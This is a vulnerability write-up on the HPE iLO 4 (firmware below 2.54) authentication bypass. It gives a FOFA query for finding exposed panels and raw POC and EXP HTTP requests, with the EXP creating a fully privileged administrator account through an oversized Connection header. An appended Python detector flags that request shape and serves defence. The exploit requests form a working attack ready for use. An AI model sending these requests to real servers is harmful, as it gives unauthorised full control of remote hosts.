Principle
Unauthenticated access: the add-user operation does not verify the identity of the caller, so an unauthenticated user can add accounts.
Affected scope
iLO 4 firmware, 2.xx versions below 2.54
Impact
Full access to the iLO web panel is obtained; the host can then be controlled through the remote console software bundled with HPE iLO.
Download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8
POC & EXP
fofa
title="iLO"
Manual
# POC
GET /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
# EXP
POST /rest/v1/AccountService/Accounts HTTP/1.1
Host: x.x.x.x:x
Content-Length: 273
Accept-Encoding: gzip, deflate
Accept: */*
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Type: application/json
{"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"Privileges": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true}, "LoginName": "administratar"}}}
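As an added defender-side example (not part of the original writeup), the following Python flags requests with the shape shown above: the account-management endpoint and the 29-character Connection value come from the page, while the host name and sample requests are constructed.

```python
# Detection helper for the iLO 4 account-creation bypass described above:
# flag requests to the account-management REST endpoint that carry an abnormal
# Connection header, the shape shown in the POC/EXP requests. Samples are constructed.
from typing import Dict, List, Tuple

ACCOUNT_ENDPOINT = "/rest/v1/AccountService/Accounts"
# Values a legitimate client would send in Connection (RFC 7230 tokens).
KNOWN_CONNECTION_TOKENS = {"keep-alive", "close", "upgrade", "te"}
# The page's POC/EXP requests carry a 29-character Connection value.
SUSPICIOUS_CONNECTION_LEN = 29

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def assess(raw: str) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious."""
    method, path, headers = parse_request(raw)
    findings: List[str] = []
    conn = headers.get("connection", "")
    tokens = {t.strip().lower() for t in conn.split(",") if t.strip()}
    if conn and not tokens <= KNOWN_CONNECTION_TOKENS:
        findings.append(f"non-standard Connection value ({len(conn)} chars)")
    if len(conn) >= SUSPICIOUS_CONNECTION_LEN:
        findings.append("oversized Connection header")
    if path.startswith(ACCOUNT_ENDPOINT):
        findings.append(f"{method} on account management endpoint")
        if method == "POST" and "oversized Connection header" in findings:
            findings.append("likely unauthenticated account creation attempt")
    return findings

# Constructed samples: a normal client request and the two shapes shown above.
BENIGN = "GET /rest/v1/Systems HTTP/1.1\nHost: ilo.example\nConnection: keep-alive\n"
POC_SHAPE = ("GET /rest/v1/AccountService/Accounts HTTP/1.1\nHost: ilo.example\n"
             "Connection: " + "A" * 29 + "\nContent-Type: application/json\n")
EXP_SHAPE = ("POST /rest/v1/AccountService/Accounts HTTP/1.1\nHost: ilo.example\n"
             "Connection: " + "A" * 29 + "\nContent-Type: application/json\n\n{...}\n")

if __name__ == "__main__":
    for name, req in [("benign", BENIGN), ("poc", POC_SHAPE), ("exp", EXP_SHAPE)]:
        print(name, assess(req) or "clean")
```

Run it against proxy or web-server access records that preserve request headers; the same checks also apply as a virtual-patch rule on a reverse proxy in front of iLO while firmware is being updated.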